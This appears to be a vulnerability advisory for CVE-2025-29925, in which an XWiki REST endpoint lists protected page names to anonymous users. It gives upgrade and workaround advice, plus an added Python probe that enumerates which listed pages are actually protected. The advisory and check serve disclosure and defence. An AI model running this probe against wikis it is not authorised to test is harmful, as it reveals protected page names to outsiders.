PT-2025-11971 · Unknown · Xwiki Platform

Published

2025-03-19

·

Updated

2025-03-19

·

CVE-2025-29925

CVSS v4.0

8.7

High

Vector

AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Name of the Vulnerable Software and Affected Versions

XWiki Platform versions prior to 15.10.14
XWiki Platform versions prior to 16.4.6
XWiki Platform versions prior to 16.10.0-rc-1

Description

The issue affects the XWiki Platform, a generic wiki platform. The REST endpoint "/rest/wikis/[wikiName]/pages" lists pages even when the requesting user has no view right on them, so the names of pages that should be protected are disclosed to that user. This is particularly noticeable when the entire wiki is protected with "Prevent unregistered users from viewing pages": the endpoint still lists the pages of the wiki, though only for the main wiki.

Recommendations

For versions prior to 15.10.14, update to XWiki Platform version 15.10.14 or later.
For versions prior to 16.4.6, update to XWiki Platform version 16.4.6 or later.
For versions prior to 16.10.0-rc-1, update to XWiki Platform version 16.10.0-rc-1 or later.
As a temporary workaround, restrict access to the "/rest/wikis/[wikiName]/pages" endpoint (for example at a reverse proxy in front of XWiki) until the patch is applied.
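The following script is an added example and not code from XWiki or from this advisory. It checks for the behaviour described above on one wiki: it fetches "/rest/wikis/<wiki>/pages" without credentials, then fetches each listed page resource with the same anonymous client, and reports every page that the listing revealed but that answers 401 or 403 when requested directly. The embedded listing, the host wiki.example and the per-page status table are constructed sample data; the XML shape (pageSummary elements with fullName, title and a rel="http://www.xwiki.org/rel/page" link, in the http://www.xwiki.org namespace) is approximated from XWiki's REST representation and should be treated as an assumption.

```python
"""Probe for the CVE-2025-29925 listing disclosure on an XWiki instance.

Added example; not XWiki project code. Run with no arguments to exercise the
constructed sample, or pass a base URL such as https://wiki.example to probe a
real instance anonymously (no credentials are ever sent).
"""
from __future__ import annotations

import sys
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET
from typing import Callable

# XWiki's REST resources use this XML namespace and link relation (assumed).
XWIKI_NS = "{http://www.xwiki.org}"
PAGE_REL = "http://www.xwiki.org/rel/page"

# Constructed sample of a /rest/wikis/xwiki/pages response; not a capture.
SAMPLE_LISTING = """<?xml version="1.0" encoding="UTF-8"?>
<pages xmlns="http://www.xwiki.org">
  <pageSummary>
    <fullName>Main.WebHome</fullName>
    <title>Home</title>
    <link rel="http://www.xwiki.org/rel/page"
          href="http://wiki.example/rest/wikis/xwiki/spaces/Main/pages/WebHome"/>
  </pageSummary>
  <pageSummary>
    <fullName>Sandbox.Secret</fullName>
    <title>Internal roadmap</title>
    <link rel="http://www.xwiki.org/rel/page"
          href="http://wiki.example/rest/wikis/xwiki/spaces/Sandbox/pages/Secret"/>
  </pageSummary>
</pages>
"""

# Constructed per-page answers for the sample: the home page is public, the
# Sandbox page is protected and answers 401 to an anonymous request.
SAMPLE_STATUS = {
    "http://wiki.example/rest/wikis/xwiki/spaces/Main/pages/WebHome": 200,
    "http://wiki.example/rest/wikis/xwiki/spaces/Sandbox/pages/Secret": 401,
}


def parse_page_listing(listing_xml: str) -> list[dict[str, str | None]]:
    """Return one dict per pageSummary: fullName, title and the page's REST href."""
    root = ET.fromstring(listing_xml)
    pages = []
    for summary in root.iter(XWIKI_NS + "pageSummary"):
        href = None
        for link in summary.findall(XWIKI_NS + "link"):
            if link.get("rel") == PAGE_REL:
                href = link.get("href")
        pages.append({
            "fullName": summary.findtext(XWIKI_NS + "fullName"),
            "title": summary.findtext(XWIKI_NS + "title"),
            "href": href,
        })
    return pages


def anonymous_status(url: str, timeout: float = 10.0) -> int:
    """HTTP status of an unauthenticated GET; error statuses are returned, not raised."""
    req = urllib.request.Request(url, headers={"Accept": "application/xml"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def find_leaked_pages(listing_xml: str, probe: Callable[[str], int]) -> list[str]:
    """Names of listed pages whose own resource denies the same anonymous caller.

    A page present in the listing that answers 401/403 when fetched directly is
    exactly the disclosure in the advisory: its name was revealed to a caller
    who has no view right on it.
    """
    leaked = []
    for page in parse_page_listing(listing_xml):
        if page["href"] and probe(page["href"]) in (401, 403):
            leaked.append(page["fullName"])
    return leaked


def check_wiki(base_url: str, wiki: str = "xwiki") -> list[str]:
    """Fetch one wiki's listing anonymously and report the leaked page names.

    On a patched or proxy-restricted instance the listing itself is denied to
    anonymous callers; that case is reported as no leak rather than an error.
    """
    listing_url = f"{base_url.rstrip('/')}/rest/wikis/{wiki}/pages"
    req = urllib.request.Request(listing_url, headers={"Accept": "application/xml"})
    try:
        with urllib.request.urlopen(req, timeout=10.0) as resp:
            listing_xml = resp.read().decode("utf-8")
    except urllib.error.HTTPError as err:
        if err.code in (401, 403):
            return []
        raise
    return find_leaked_pages(listing_xml, anonymous_status)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        result = check_wiki(sys.argv[1])
    else:
        result = find_leaked_pages(SAMPLE_LISTING, SAMPLE_STATUS.__getitem__)
    print("leaked pages:", result or "none")
```

Because the description notes that only the main wiki is affected, run check_wiki against the main wiki identifier (usually "xwiki") rather than a subwiki; an empty result on a subwiki does not show that the instance is patched.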

Related Identifiers

BDU:2025-03253
CVE-2025-29925
GHSA-22Q5-9PHM-744V

Affected Products

Xwiki Platform